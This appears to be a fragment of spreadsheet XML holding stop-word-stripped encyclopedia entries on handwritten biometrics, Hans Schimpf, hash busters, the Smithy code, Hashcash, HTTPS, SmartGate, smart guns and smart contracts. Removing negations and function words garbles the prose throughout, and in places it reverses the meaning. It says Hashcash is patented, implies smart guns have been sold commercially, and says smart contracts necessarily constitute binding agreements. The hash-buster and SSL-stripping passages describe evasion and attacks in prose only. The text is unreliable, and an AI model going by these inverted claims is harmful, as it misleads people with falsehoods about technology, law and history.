international conference systems, signals image processing. 57–60. doi:10.1109/iwssip.2008.4604366. isbn 978-80-227-2856-0. s2cid 14819673.</t>
  </si>
  <si>
    <t>Handwritten biometric recognition</t>
  </si>
  <si>
    <t>handwritten biometric recognition process identifying author given text handwriting style. handwritten biometric recognition belongs behavioural biometric systems based something user learned static dynamic recognition handwritten biometrics split main categories: static: mode, users writes paper, digitize optical scanner camera, biometric system recognizes text analyzing shape. this group also known "off-line". dynamic: mode, users writes digitizing tablet, acquires text real time. another possibility acquisition means stylus-operated pdas. dynamic recognition also known "on-line".dynamic information usually consists following information: spatial coordinate x(t) spatial coordinate y(t) pressure p(t) azimuth az(t) inclination in(t) better accuracies achieved means dynamic systems. some technological approaches exist. difference handwritten biometric recognition confused optical character recognition (ocr). while goal handwritten biometrics identify author given text, goal recognize content text, regardless author. references</t>
  </si>
  <si>
    <t>Hans Schimpf</t>
  </si>
  <si>
    <t>hans schimpf (1897 esslingen april 1935 breslau) german reichsmarine intelligence officer. during interwar period helped co-found, instruction reichsluftfahrtministerium, signals intelligence organization called forschungsamt (abbr. fa); along hermann göring gottfried schapper. responsible organization 1933 1935. career schimpf entrepreneur ernst schimpf rosa helene schimpf fink. sister elisabeth eugenie rosa merz. schimpf married margaretha helena schimpf deffner four children. entered german navy young age. reached rank korvettenkapitän 1933. 1933, schimpf came notice hermann göring looking trained personnel agency, forschungsamt. schimpf acting liaison officer reichsmarine signals intelligence service, b-dienst german army signals intercept service, abwehr cipher bureau. time, schimpf personal friend göring nazi.during time reichswehr cipher bureau, schimpf somewhat dark horse, organized within nazi party cell, secret. undertook several trips abroad link abwehr cipher bureau italian armed forces, e.g. servizio informazioni militare also small illicit german intercept station private estate near barcelona spain. intercept station configured intercept shipping traffic mediterranean, reichsmarine. also monitored french radio stations north africa southwestern france.schimpf made large number contacts, leading personalities fascist organizations italy spain, attracted göring. schimpf entrusted start agency. selected people, along gottfried schapper, original idea agency people unit. nazi party members. schimpf started agency, march 1933.by june 1934, night long knives, schimpf promoted ministerial rank (german: ministerialrat), ensured position great power.in early 1933, reinhard heydrich, head reich security main office, competing goering's research office, tried persuade schimpf work heinrich himmler without knowledge göring, refused. instead, heydrich supposed tried extort abuse numerous foreign affairs. death mid-april 1935, schimpf, could always reached telephone, gone away indefinite period. rumours began circulate, conflicting information coming agency, confirmed: schimpf dead. several versions death reported, including accident, happened silesia, berlin, künigsberg. later people informed committed suicide, dozen locations mentioned place death, story killed lady friend. deviated reports suggest killed czech agent. american historian jonathan petropoulos, book 'royals reich: princes hesse nazi germany', also discussed schimpf's successor, prince christoph hesse, member, appointed director schimpfs' body discovered, argues likely scenario assassination schimpf office chief (german: amtsleiter) behalf heinrich himmler reinhard heydrich, seeing unwelcome competitor security service control.wilhelm flicke, german world veteran cipher officer commissioned general erich fellgiebel write history german cryptography cryptanalysis war, wrote book secrets ether following: eavesdropping reichswehr, schimpf recruited organized agent network within organization work. march 1935, agents extracted exceedingly important document safe reichswehr order turn mimeographing inspection. documents needed reichswehr, days easter located. investigation initiated, results reported werner blomberg, opposition hermann göring schimpf, made case hitler, ended disavowing schimpf. april 1935, göring getting married, schimpf found grünewald bullet hole head. there doubt schimpf commit suicide assassinated gestapo. schimpf generally happy individual extremely fond life, became dangerous göring himmler, killed.schimpf cremated crematory wilmersdorf elaborate ceremony carried göring. large wreath delivered inscription: faithful collaborator hans schimpf, gratitude hermann göring this followed address state secretary erhard milch salute honour. references</t>
  </si>
  <si>
    <t>Hash buster</t>
  </si>
  <si>
    <t>hash buster program randomly adds characters data order change data's hash sum.this typically used words spam e-mails, bypass hash filters. e-mail's hash different e-mails previously defined spam, e-mail considered spam therefore delivered normal message. hash busters also used randomly content kind file hash becomes certain sum. e-mail context, could used bypass filter accepts e-mails certain sum. initially spams containing "white noise" hash busters tended simply exhibit 'paragraphs' literally random words, increasingly appearing somewhat grammatical. also cryptographic hash function bayesian poisoning locality-sensitive hashing references external links searchcio.com definitions</t>
  </si>
  <si>
    <t>Smithy code</t>
  </si>
  <si>
    <t>smithy code series letters embedded, private amusement, within april 2006 approved judgement justice peter smith vinci code copyright case. first broken, month, tench, lawyer writes media issues guardian, received series email clues justice smith. code works letters question part actual text judgement, italicised contrast rest text. following sequence unusually italicised letters extracted judgement document: vthe italicised letters occur paragraph (which page 71-page document). meanwhile, paragraph concludes sentence: "the solving conundrum posed judgment reading hbhg dvc." (these abbreviations used smith throughout judgement referring books issue, holy blood holy grail vinci code.) there sections judgement. source words judgement letters (with intervening words removed): claimants claimant reality cynicism preceded templar jersey able research techniques extinguished technical story something groups used documents eradicated elsewhere templars claimants sequence plantard introduced manuscripts ultimately questions emblazoned prevalent letter frequencies excluding leading letters letter frequencies follows: letter location paragraph numbers cipher letters: claimant(s) clai(m)ant (i)s (t)hat (h)is realit(y) (c)ynicism f(o)r prece(d)ed t(e)mplar (j)ersey (a)ble res(e)arch th(i)s techniqu(e)s e(x)tinguished (t)echnical st(o)ry wa(s) (t)he somethin(g) grou(p)s u(s)ed w(a)s do(c)uments bein(g) e(r)adicated elsewh(e)re templ(a)rs clai(m)ants se(q)uence (w)ith o(f) (k)ey plant(a)rd intro(d)uced manuscri(p)ts ulti(m)ately (q)uestions embla(z)oned pre(v)alent hints from article "'da vinci' judgement code puzzles lawyers": york times reported smith sent e-mail reporter newspaper offered hint. said code referred entry year's edition britain's "who's who," references wife diane, three children frazier, parker, bailey, british naval officer jackie fisher, titanic historical society among things. solution cipher type polyalphabetic cipher known variant beaufort, using keyword based fibonacci sequence, namely aaycehmu. this reverse vigenère cipher, enables decryption rather encryption. assigning letter place alphabet, keyword corresponds possible reason included denote backward step rather forward step. twist drawn holy blood holy grail, concerns number fibonacci series, becomes requirement count letters back regular alphabet rather signal alphabet begins instance, first coded message, corresponds fibonacci series, becomes answer. 10th ciphertext letter, really also ciphertext. repetition digraph 'mq', letters, suggested letters long, fact case. (this type attack cipher known kasiski test). full plaintext read: jackiefisherwhoareyoudreadnought, ("jackie fisher you? dreadnought") although correct application cipher reverse, decrypt, actually yields: jackiefisterwhoareyoudreadnough algorithm generating plaintext ciphertext repeating eight-letter key, relevant letter plaintext letter, take step letter back. (alternatively, done professional context, letters alphabet numbered case final step back made). jackie fisher british admiral. driving force behind development fast, big-gun battleship, chairman committee designs produced outline design first modern battleship, dreadnought." references external links complete text judgment formerly available http://www.hmcourts-service.gov.uk/images/judgment-files/baigent_v_rhg_0406.pdf. archived copy text december 2006 found baigent random house [2006] ewhc (ch) april 2006), text judgment without italics mark cyphertext. famous unsolved codes (lists smithy code solved) kryptos group report analyzes code together, contains link mirrored copy original judgment hoyle, (april 2006). nudge vinci judge help crack code". times. london. retrieved april 2006. hoyle, (april 2006). "how cracked smithy code (with little help judge)". times. london. retrieved april 2006. tool crack code</t>
  </si>
  <si>
    <t>Hashcash</t>
  </si>
  <si>
    <t>hashcash proof-of-work system used limit email spam denial-of-service attacks, recently become known bitcoin (and cryptocurrencies) part mining algorithm. hashcash proposed 1997 adam back described formally back's 2002 paper "hashcash denial service counter-measure". background idea "...to require user compute moderately hard, intractable function..." proposed cynthia dwork moni naor 1992 paper "pricing processing combatting junk mail". works hashcash cryptographic hash-based proof-of-work algorithm requires selectable amount work compute, proof verified efficiently. email uses, textual encoding hashcash stamp added header email prove sender expended modest amount time calculating stamp prior sending email. words, sender taken certain amount time generate stamp send email, unlikely spammer. receiver can, negligible computational cost, verify stamp valid. however, known find header necessary properties brute force, trying random values answer found; though testing individual string easy, satisfactory answers rare enough require substantial number tries find answer. hypothesis spammers, whose business model relies ability send large numbers emails little cost message, cease profitable even small cost spam send. receivers verify whether sender made investment results help filter email. technical details header line looks something like this: x-hashcash: 1:20:1303030600:anni@cypherspace.org::mcmybzihxkxu57jd:ckvi header contains: ver: hashcash format version, (which supersedes version bits: number "partial pre-image" (zero) bits hashed code. date: time message sent, format yymmdd[hhmm[ss]]. resource: resource data string transmitted, e.g., address email address. ext: extension (optional; ignored version rand: string random characters, encoded base-64 format. counter: binary counter, encoded base-64 format.the header contains recipient's email address, date message, information proving required computation performed. presence recipient's email address requires different header computed recipient. date allows recipient record headers received recently ensure header unique email message. sender's side sender prepares header appends counter value initialized random number. computes 160-bit sha-1 hash header. first bits (i.e. significant digits) hash zeros, acceptable header. not, sender increments counter tries hash again. 2160 possible hash values, 2140 hash values satisfy criterion. thus chance randomly selecting header zeros beginning hash (approx. 106, million). number times sender needs valid hash value modeled geometric distribution. hence sender average values find valid header. given reasonable estimates time needed compute hash, would take second find. efficient method brute force approach known find valid header. normal user desktop would significantly inconvenienced processing time required generate hashcash string. however, spammers would suffer significantly large number spam messages sent them. recipient's side technically system implemented following steps: recipient's computer calculates 160-bit sha-1 hash entire string (e.g., "1:20:060408:anni@cypherspace.org::1qtjayd7niiqa/sc:epa"). this takes microseconds machine, less time time takes rest e-mail received. first bits zero, hash invalid. (later versions require bits zero machine processing speeds increase.) recipient's computer checks date header (e.g., "060408", represents date 2006). within days current date, invalid. (the two-day window compensates clock skew network routing time different systems.) recipient's computer checks whether e-mail address hash string matches valid e-mail addresses registered recipient, matches mailing lists recipient subscribed. match found, hash string invalid. recipient's computer inserts hash string database. string already database (indicating attempt made re-use hash string), invalid.if hash string passes tests, considered valid hash string. tests take less time disk space receiving body content e-mail. required effort time needed compute hash collision exponential number zero bits. additional zero bits added (doubling amount time needed compute hash additional zero bit) expensive spammers generate valid header lines. confirming header valid much faster always takes amount time, matter many zero bits required valid header, since requires single hashing operation. advantages disadvantages hashcash system advantage micropayment proposals applying legitimate e-mail real money involved. neither sender recipient need pay, thus administrative issues involved micropayment system moral issues related charging e-mail entirely avoided. hand, hashcash requires potentially significant computational resources expended e-mail sent, somewhat difficult tune ideal amount average time wishes clients expend computing valid header. this mean sacrificing accessibility low-end embedded systems else running risk hostile hosts challenged enough provide effective filter spam. hashcash also fairly simple implement mail user agents spam filters. central server needed. hashcash incrementally deployed—the extra hashcash header ignored received mail clients understand plausible analysis concluded following cases likely: either non-spam e-mail stuck lack processing power sender, spam e-mail bound still through. examples include, respectively, centralized e-mail topology (like mailing list), server send enormous amount legitimate e-mails, botnets cluster farms spammers increase processing power enormously. most issues addressed. e.g., botnets expire faster users notice high load take counter-measures, mailing list servers registered white lists subscribers' hosts thus relieved hashcash challenges. another projected problem computers continue faster according moore's law. difficulty calculations required must increased time. however, developing countries expected older hardware, means find increasingly difficult participate e-mail system. this also applies lower-income individuals developed countries cannot afford latest hardware. like hashcash, cryptocurrencies hash function proof-of-work system. rise cryptocurrency created demand asic-based mining machines. although cryptocurrencies sha-256 hash function, asic technology could used create hashcash solvers three orders magnitude faster consumer cpu, reducing computational hurdle spammers. applications bitcoin mining contrast hashcash mail applications relies recipients manually amount work intended deter malicious senders, bitcoin cryptocurrency network employs different hash-based proof-of-work challenge enable competitive bitcoin mining. bitcoin miner runs computer program collects unconfirmed transactions users network. together, form "block" earn payment miner, block accepted network hash meets network's difficulty target. thus, hashcash, miners must discover brute force "nonce" that, included block, results acceptable hash. unlike hashcash, bitcoin's difficulty target specify minimum number leading zeros hash. instead, hash interpreted (very large) integer, integer must less target integer. this necessary bitcoin network must periodically adjust difficulty level maintain average time minutes successive blocks. leading zeros considered, difficulty could doubled halved, causing adjustment greatly overshoot undershoot response small changes average block time. still, number leading zeros target serves good approximation current difficulty. january 2020, block #614525 leading zeros. spam filters hashcash used potential solution false positives automated spam filtering systems, legitimate users rarely inconvenienced extra time takes mine stamp. spamassassin able check hashcash stamps since version 2.70, assigning negative score (i.e. less likely spam) valid, unspent hashcash stamps. however, although hashcash plugin default, still needs configured list address patterns must match hashcash resource field used. email clients penny post software project sourceforge implements hashcash mozilla thunderbird email client. project named historical availability conventional mailing services cost sender penny; penny post information mailing services history. email postmark microsoft also designed implemented deprecated open spec, similar incompatible hashcash, email postmark, part coordinated spam reduction initiative (csri). microsoft email postmark variant hashcash implemented microsoft mail infrastructure components exchange, outlook hotmail. format differences hashcash microsoft's email postmark postmark hashes body addition recipient, uses modified sha-1 hash function uses multiple sub-puzzles reduce proof work variance. blogs like e-mail, blogs often fall victim comment spam. some blog owners used hashcash scripts written javascript language slow comment spammers. some scripts (such wp-hashcash) claim implement hashcash instead depend javascript obfuscation force client generate matching key; require processing power, hashcash algorithm hashcash stamps. reputation digital marketplace, service providers hashcash build reputation attract clients. build reputation, service provider first selects public discovers brute force nonce that, concatenated results hash digest several leading zeros. zeros, higher reputation. intellectual property hashcash patented, reference implementation implementations free software. hashcash included available many linux distributions. made statements ietf client-puzzles context described client-puzzles (not hashcash). included hashcash title referenced hashcash, mechanism described known-solution interactive challenge akin client-puzzles; hashcash non-interactive therefore known solution. case rsa's statement apply hashcash hashcash predates (march 1997) client-puzzles publication (february 1999) client-puzzles patent filing us7197639 (february 2000). also penny black (research project) notes references adam back, "hashcash denial service counter-measure", technical report, august 2002 (pdf). laurie richard clayton, "'proof-of-work' proves work", weis (pdf). dwork, naor, (1992) "pricing processing combating junk mail", crypto '92, 139–147. (pdf) external links hashcash homepage beat spam using hashcash david mertz's article hashcash, applications implementation python note ietf hashcash (2004)</t>
  </si>
  <si>
    <t>HTTPS</t>
  </si>
  <si>
    <t>hypertext transfer protocol secure (https) extension hypertext transfer protocol (http). used secure communication computer network, widely used internet. https, communication protocol encrypted using transport layer security (tls) formerly, secure sockets layer (ssl). protocol therefore also referred http tls, http ssl. principal motivations https authentication accessed website, protection privacy integrity exchanged data transit. protects man-in-the-middle attacks, bidirectional encryption communications client server protects communications eavesdropping tampering. authentication aspect https requires trusted third party sign server-side digital certificates. this historically expensive operation, meant fully authenticated https connections usually found secured payment transaction services secured corporate information systems world wide web. 2016, campaign electronic frontier foundation support browser developers protocol becoming prevalent. https used often users original non-secure http, primarily protect page authenticity types websites; secure accounts; keep user communications, identity, browsing private. overview uniform resource identifier (uri) scheme https identical usage syntax http scheme. however, https signals browser added encryption layer ssl/tls protect traffic. ssl/tls especially suited http, since provide protection even side communication authenticated. this case http transactions internet, typically server authenticated client examining server's certificate). https creates secure channel insecure network. this ensures reasonable protection eavesdroppers man-in-the-middle attacks, provided adequate cipher suites used server certificate verified trusted. because https piggybacks http entirely tls, entirety underlying http protocol encrypted. this includes request's url, query parameters, headers, cookies (which often contain identifying information user). however, website addresses port numbers necessarily part underlying tcp/ip protocols, https cannot protect disclosure. practice means even correctly configured server, eavesdroppers infer address port number server, sometimes even domain name (e.g. www.example.org, rest url) user communicating with, along amount data transferred duration communication, though content communication.web browsers know trust https websites based certificate authorities come pre-installed software. certificate authorities trusted browser creators provide valid certificates. therefore, user trust https connection website following true: user trusts device hosting browser method browser itself, compromised (i.e., supply chain attack) user trusts browser software correctly implements https correctly pre-installed certificate authorities. user trusts certificate authority vouch legitimate websites. (i.e., certificate authority compromised mis-issuance certificates.) website provides valid certificate, means signed trusted authority. certificate correctly identifies website (e.g., browser visits "https://example.com", received certificate properly "example.com" entity). user trusts protocol's encryption layer (ssl/tls) sufficiently secure eavesdroppers.https especially important insecure networks networks subject tampering. insecure networks, public wi-fi access points, allow anyone local network packet-sniff discover sensitive information protected https. additionally, free-to-use paid wlan networks observed tampering webpages engaging packet injection order serve websites. this practice exploited maliciously many ways, injecting malware onto webpages stealing users' private information.https also important connections network, malicious nodes could otherwise damage alter contents passing insecure fashion inject malware connection. this reason electronic frontier foundation project started development https everywhere, included browser.as information revealed global mass surveillance criminals stealing personal information, https security websites becoming increasingly important regardless type internet connection used. even though metadata individual pages user visits might considered sensitive, aggregated reveal user compromise user's privacy.deploying https also allows http/2 predecessor, now-deprecated protocol spdy), generation http designed reduce page load times, size, latency. recommended http strict transport security (hsts) https protect users man-in-the-middle attacks, especially stripping.https confused seldom-used secure http (s-http) specified 2660. usage websites april 2018, 33.2% alexa 1,000,000 websites https default, 57.1% internet's 137,971 popular websites secure implementation https, page loads (measured firefox telemetry) https. however despite 1.3’s release, adoption slow, many still remain older protocol. browser integration most browsers display warning receive invalid certificate. older browsers, connecting site invalid certificate, would present user dialog asking whether wanted continue. newer browsers display warning across entire window. newer browsers also prominently display site's security information address bar. extended validation certificates show legal entity certificate information. most browsers also display warning user visiting site contains mixture encrypted unencrypted content. additionally, many filters return security warning visiting prohibited websites. electronic frontier foundation, opining ideal world, every request could defaulted https", provided add-on called https everywhere mozilla firefox, google chrome, chromium, android, enables https default hundreds frequently used websites.forcing browser load https content supported firefox starting version starting version google chrome able "always secure connections" toggled browser's settings. security security https underlying tls, typically uses long-term public private keys generate short-term session key, used encrypt data flow client server. x.509 certificates used authenticate server (and sometimes client well). consequence, certificate authorities public certificates necessary verify relation certificate owner, well generate, sign, administer validity certificates. while beneficial verifying identities trust, 2013 mass surveillance disclosures drew attention certificate authorities potential weak point allowing man-in-the-middle attacks. important property context forward secrecy, ensures encrypted communications recorded past cannot retrieved decrypted long-term secret keys passwords compromised future. servers provide forward secrecy.for https effective, site must completely hosted https. site's contents loaded http (scripts images, example), certain page contains sensitive information, log-in page, loaded https rest site loaded plain http, user vulnerable attacks surveillance. additionally, cookies site served https must secure attribute enabled. site sensitive information user session exposed every time site accessed http instead https. technical difference http https urls begin "https://" port default, whereas, http urls begin "http://" port default. http encrypted thus vulnerable man-in-the-middle eavesdropping attacks, attackers gain access website accounts sensitive information, modify webpages inject malware advertisements. https designed withstand attacks considered secure (with exception https implementations deprecated versions ssl). network layers http operates highest layer tcp/ip model—the application layer; security protocol (operating lower sublayer layer), encrypts http message prior transmission decrypts message upon arrival. strictly speaking, https separate protocol, refers ordinary http encrypted ssl/tls connection. https encrypts message contents, including http headers request/response data. with exception possible cryptographic attack described limitations section below, attacker able discover connection taking place parties, along domain names addresses. server setup prepare server accept https connections, administrator must create public certificate server. this certificate must signed trusted certificate authority browser accept without warning. authority certifies certificate holder operator server presents browsers generally distributed list signing certificates major certificate authorities verify certificates signed them. acquiring certificates number commercial certificate authorities exist, offering paid-for ssl/tls certificates number types, including extended validation certificates. let's encrypt, launched april 2016, provides free automated service delivers basic ssl/tls certificates websites. according electronic frontier foundation, let's encrypt make switching http https easy issuing command, clicking button." majority hosts cloud providers leverage let's encrypt, providing free certificates customers. access control system also used client authentication order limit access server authorized users. this, site administrator typically creates certificate user, user loads browser. normally, certificate contains name e-mail address authorized user automatically checked server connection verify user's identity, potentially without even requiring password. case compromised secret (private) important property context perfect forward secrecy (pfs). possessing long-term asymmetric secret keys used establish https session make easier derive short-term session decrypt conversation, even later time. diffie–hellman exchange (dhe) elliptic curve diffie–hellman exchange (ecdhe) 2013 schemes known property. 2013, firefox, opera, chromium browser sessions used nearly apple's safari microsoft internet explorer sessions. 1.3, published august 2018, dropped support ciphers without forward secrecy. february 2020, 96.6% servers surveyed support form forward secrecy, 52.1% forward secrecy browsers. certificate revocation certificate revoked expires, example secrecy private compromised. newer versions popular browsers firefox, opera, internet explorer windows vista implement online certificate status protocol (ocsp) verify case. browser sends certificate's serial number certificate authority delegate ocsp (online certificate status protocol) authority responds, telling browser whether certificate still valid not. also issue tell people certificates revoked. crls longer required ca/browser forum, nevertheless, still widely used cas. most revocation statuses internet disappear soon expiration certificates. limitations (secure sockets layer) (transport layer security) encryption configured modes: simple mutual. simple mode, authentication performed server. mutual version requires user install personal client certificate browser user authentication. either case, level protection depends correctness implementation software cryptographic algorithms use. ssl/tls prevent indexing site crawler, cases encrypted resource inferred knowing intercepted request/response size. this allows attacker access plaintext (the publicly available static content), encrypted text (the encrypted version static content), permitting cryptographic attack. because operates protocol level http knowledge higher-level protocols, servers strictly present certificate particular address port combination. past, meant feasible name-based virtual hosting https. solution called server name indication (sni) exists, sends hostname server encrypting connection, although many browsers support extension. support available since firefox opera apple safari 2.1, google chrome internet explorer windows vista.from architectural point view: ssl/tls connection managed first front machine initiates connection. reasons (routing, traffic optimization, etc.), front machine application server decipher data, solutions found propagate user authentication information certificate application server, needs know going connected. ssl/tls mutual authentication, ssl/tls session managed first server initiates connection. situations encryption propagated along chained servers, session timeout management becomes extremely tricky implement. security maximal mutual ssl/tls, client-side properly ssl/tls connection disconnect user except waiting server session expire closing related client applications.a sophisticated type man-in-the-middle attack called stripping presented 2009 blackhat conference. this type attack defeats security provided https changing https: link http: link, taking advantage fact internet users actually type "https" browser interface: secure site clicking link, thus fooled thinking using https fact using http. attacker communicates clear client. this prompted development countermeasure http called http strict transport security. https shown vulnerable range traffic analysis attacks. traffic analysis attacks type side-channel attack relies variations timing size traffic order infer properties encrypted traffic itself. traffic analysis possible ssl/tls encryption changes contents traffic, minimal impact size timing traffic. 2010, research paper researchers microsoft research indiana university discovered detailed sensitive user data inferred side channels packet sizes. researchers found that, despite https protection several high-profile, top-of-the-line applications healthcare, taxation, investment, search, eavesdropper could infer illnesses/medications/surgeries user, his/her family income, investment secrets. although work demonstrated vulnerability https traffic analysis, approach presented authors required manual analysis focused specifically applications protected https. fact modern websites, including google, yahoo!, amazon, https causes problems many users trying access public wi-fi spots, wi-fi spot login page fails load user tries open https resource. several websites, neverssl.com, guarantee always remain accessible http. history netscape communications created https 1994 netscape navigator browser. originally, https used protocol. evolved transport layer security (tls), https formally specified 2818 2000. google announced february 2018 chrome browser would mark http sites "not secure" july 2018. this move encourage website owners implement https, effort make world wide secure. also interplanetary file system replace https bullrun (decryption program) secret anti-encryption program national security agency computer security hsts opportunistic encryption stunnel references external links 2818: http over 5246: transport layer security protocol 6101: secure sockets layer (ssl) protocol version https works ...in comic! fast yet?</t>
  </si>
  <si>
    <t>SmartGate</t>
  </si>
  <si>
    <t>smartgate (egate zealand) automated self-service border control system operated australian border force zealand customs service located immigration checkpoints departure arrival halls australian international airports, zealand international airports egate). smartgates allow australian epassport holders epassport holders number countries clear immigration controls rapidly, enhance travel security performing passport control checks electronically. smartgate uses facial recognition technology verify traveller's identity data stored chip biometric passport, well checking immigration databases. smartgate system, traveller must biometric passport australia, zealand certain countries (these epassports biometric logo front cover). epassport gate scanner reads information contained chip inside passport runs data numerous databases determine traveller security risk, camera takes picture traveller officer control station behind gates checks image captured camera matches passport (facial recognition). once data verification facial recognition process complete, doors automatically either open, signifying traveller permitted enter and/or exit country, remain closed stop icon illuminate, demonstrating traveller failed security checks personally meet immigration officials. travellers require biometric passport smartgate uses information passport (such photograph, name date birth) respective countries' databases (i.e. banned travellers database) decide whether grant entry departure country generate referral customs agent. these checks would otherwise require manual processing human time-consuming, costly potentially error-prone. history first trials smartgate began 2002 qantas aircrews. trials expanded 2004 include 1,000 qantas platinum frequent flyers, 2007 launched public brisbane airport.since october 2005, australia issued biometric passports, called epassports. validity australian passports exceed years, previous australian passports expired valid passports biometric. 2015, australian government announced smartgate launched ports, using solely biometrics identify process arriving passengers, goal processing travellers automatically 2020. introduction biometric arrivals, seamless traveller initiative, expected cost approximately au$93.7m years completed march 2019. eligibility australia travellers required hold epassport, valid australian visa (except australian zealand citizens) complete arrival card. system requires travellers look much like passport photo possible, require removing glasses hats using smartgate. exceptions there number notable exceptions entering departing australia using smartgate. airline crew meet requirements also eligible smartgate continue "crew lane". australian zealand citizens travelling military orders smartgate upon arrival. australian children aged years (inclusive) smartgate upon arrival accompanied least adults. locations australia, smartgate available international airports: zealand egate uses biometrics match picture face epassport picture takes gate. make sure egate able this, passengers must look similar epassport photo possible. passengers avoid headwear (including veils, scarfs, hats) obscure face. requirements departing travellers, regardless nationality, smartgate machine-readable passport independently machine. arriving travellers using egate must: hold epassport issued following countries:in zealand, smartgate (named egate) available four international airports: privacy issues smartgate system collects personal information includes information biometric page passport, name, gender, date birth, passport number, passport photograph, nationality, country origin passport.other information also collected, travel details, facial biometric template.travellers passports longer stamped processed smartgate. also epassport gates similar system operated united kingdom parafe similar system operated france references external links australian border force: smartgates</t>
  </si>
  <si>
    <t>Smart gun</t>
  </si>
  <si>
    <t>smart gun, also called smart-gun, smartgun, firearm detect authorized user(s) something normally possessed authorized user(s). term also used science fiction refer various types semi-automatic firearms. smart guns systems allow fire activated authorized user. those systems typically employ rfid chips proximity tokens, fingerprint recognition, magnetic rings, mechanical locks. they thereby prevent accidental shootings, thefts, criminal usage persons authorized guns. related smart guns smart firearms safety devices biometric rfid activated accessories safes. commercial availability smart ever sold commercial market united states. armatix ip1, caliber handgun active rfid watch used unlock mature smart developed. briefly planned offered retailers quickly withdrawn pressure gun-rights advocates concerned would trigger jersey childproof handgun law.as 2019, number startups companies including armatix, biofire, lodestar firearms, swiss company saar purportedly developing various smart handguns rifles, none brought technology market. reception reception concept smart technology mixed. there public calls develop technology, notably president obama. gun-rights groups including national rifle association america expressed concerns technology could mandated, firearms enthusiasts concerned technology reliable enough trust. national rifle association membership boycotted smith wesson revealed 1999 company developing smart u.s. government.more recently, official policy nra-ila, lobbying nra, regards smart guns, follows: "the oppose development 'smart' guns, ability americans voluntarily acquire them. however, opposes prohibiting americans acquiring possessing firearms possess "smart" technology." enforcement some smart proponents called federal, state, local police organizations take lead adopting smart technology, either voluntarily purchasing mandate. there scattered support voluntary test programs enforcement leaders, including francisco police chief greg suhr, said, "officer safety huge, want compel upon officers. many officers technology, certain officers would willing pilot.".richard beary, president international association chiefs police, said would "plenty agencies interested beta testing technology" smart gun] can't percent accurate, percent accurate. work every single time." james pasco, executive director fraternal order police, represents 325,000 officers nationwide, stated, "police officers general, federal officers particular, asked guinea pigs evaluating firearm nobody's even seen yet. very, serious questions." jersey mandate united states, jersey passed childproof handgun bill state december 2002, would required guns sold state jersey mechanism prevent unauthorized users firing taking effect three years smart approved state. weapons used enforcement officers would exempt smart requirement. july 2019, governor phil murphy signed bill repealed substantially original childproof handgun replaced requirement state attorney general approves production model firearms retailer state would required carry display least smart shelves sign... disclosing features personalized handguns offered traditional handguns".the potential effects jersey's smart also influenced opposition technology united states; attempts sell armatix smart california maryland opposition rights groups, argued allowing sold united states would trigger law. december 2014, attorney general jersey determined armatix would meet legal criteria sufficient trigger mandate. reliability concerns many firearm enthusiasts object smart guns philosophical regulatory basis. ownership advocate kenneth royce, writing name "boston party", wrote defensive firearm ever rely upon technology advanced newtonian physics. that includes batteries, radio links, encryption, scanning devices microcomputers."techcrunch technology outdoors journalist stokes summarizes reliability concerns smart guns stating, "first, electronic technology 100% reliable, people trust turned brick failure on-board circuitry. second, whenever attach software category things especially software kind connection outside world, whether rfid actual network addition whatever problems thing before, introduced whole host brand security identity problems thing must discovered patched, patches problems must discovered patched, goes." potential advantages owners smart firearms safety technology intended prevent accidental misuse firearms children teens, well reducing accidental discharges firearm owner firearm stolen taken away. smart guns also reduce incidents suicide unauthorized users firearm. enforcement enforcement applications also hold promise; francisco police chief greg suhr went record supporting smart guns potential reduce risk enforcement officer's used her, rendering stolen guns unfireable. richard beary, president international association chiefs police, quoted washington post saying would "plenty agencies interested beta testing [smart gun] technology." april 2014, attorney general eric holder told house appropriations subcommittee agency exploring smart technology means curbing violence. justice department requested $382.1 million increased spending fiscal year 2014 budget "gun safety," figure includes million "gun safety technology" grants, would award prizes technologies "proven reliable effective."in october 2013 european commission published document commissioner cecilia malmström, stating "the commission work firearms industry explore technological solutions, biometric sensors personal data stored firearm, ensuring purchased firearms used legal owner. carry detailed cost-benefit analysis question making 'smart gun' security features mandatory firearms lawfully sold eu." potential disadvantages joseph steinberg writes "biometrics take time process often inaccurate especially user duress likely going case situation needs brandish gun.... ideal requirement power devices utilized cases emergency need electricity previously. many fire codes allow fire extinguishers require battery operate?" steinberg writes "smartguns might hackable" "susceptible government tracking jamming...firearms must able disassembled order cleaned maintained. principles information security someone physical access machine undermine security." follow piece published january 2016, steinberg noted smartguns utilize wireless communications detect shooter wearing watch, bracelet, device "allow criminals (and police) identify carrying weapon" undermining "one reasons states require people carry weapons concealed; civilian-carried guns concealed, criminals know carrying not, fear mugging everyone, protects unarmed well armed."according article website, concerns smart guns make firearm likely fail needed self-defense. "batteries dead, temperature moisture harm electronics many 'smart gun' designs, armatix's ip1, require person wear watch, bracelet, device." smart guns also take considerable time ready firing "cold start." science fiction smart guns commonly used science fiction, biometric identification, also auto-aiming capabilities smart bullets. prominent example lawgiver used judge dredd, linked dna. another smart aliens, carried waist-mounted robotic arm. concept later used army prototype, although engineers moved mount waist back, ergonomic issues.a smart also featured movie shoot (film). also locationized sentry references external links long, duncan (july 2002). really need smart gun?" duncanlong.com rosenwald, michael (may 2014). "threats maryland dealer raise doubts future smart guns". washington post</t>
  </si>
  <si>
    <t>Smart contract</t>
  </si>
  <si>
    <t>smart contract computer program transaction protocol intended automatically execute, control document legally relevant events actions according terms contract agreement. objectives smart contracts reduction need trusted intermediators, arbitrations costs, fraud losses, well reduction malicious accidental exceptions. smart contracts commonly associated cryptocurrencies, smart contracts introduced ethereum generally considered fundamental building block decentralized finance (defi) applications.vending machines mentioned oldest piece technology equivalent smart contract implementation. original ethereum white paper vitalik buterin 2014 describes bitcoin protocol weak version smart contract concept originally defined nick szabo, proposes stronger version based solidity language, turing complete. since bitcoin, various cryptocurrencies support scripting languages allow advanced smart contracts untrusted parties. smart contracts distinguished smart legal contracts, latter refers traditional natural-language legally-binding agreements selected terms expressed implemented machine-readable code. etymology smart contracts first proposed early 1990s nick szabo, coined term, using refer promises, specified digital form, including protocols within parties perform promises". 1998, term used describe objects rights management service layer system stanford infobus, part stanford digital library project. legal status smart contracts smart contract necessarily constitute valid binding agreement law. some legal academics claim smart contracts legal agreements, rather means performing obligations deriving agreements technological means automation payment obligations obligations consisting transfer tokens cryptocurrencies. additionally, scholars argued imperative declarative nature programming languages impact legal validity smart contracts.since 2015 launch ethereum blockchain, term "smart contract" specifically applied toward notion general purpose computation takes place blockchain distributed ledger. national institute standards technology describes "smart contract" "collection code data (sometimes referred functions state) deployed using cryptographically signed transactions blockchain network". interpretation, used example ethereum foundation ibm, smart contract necessarily related classical concept contract, kind computer program. smart contract also regarded secured stored procedure 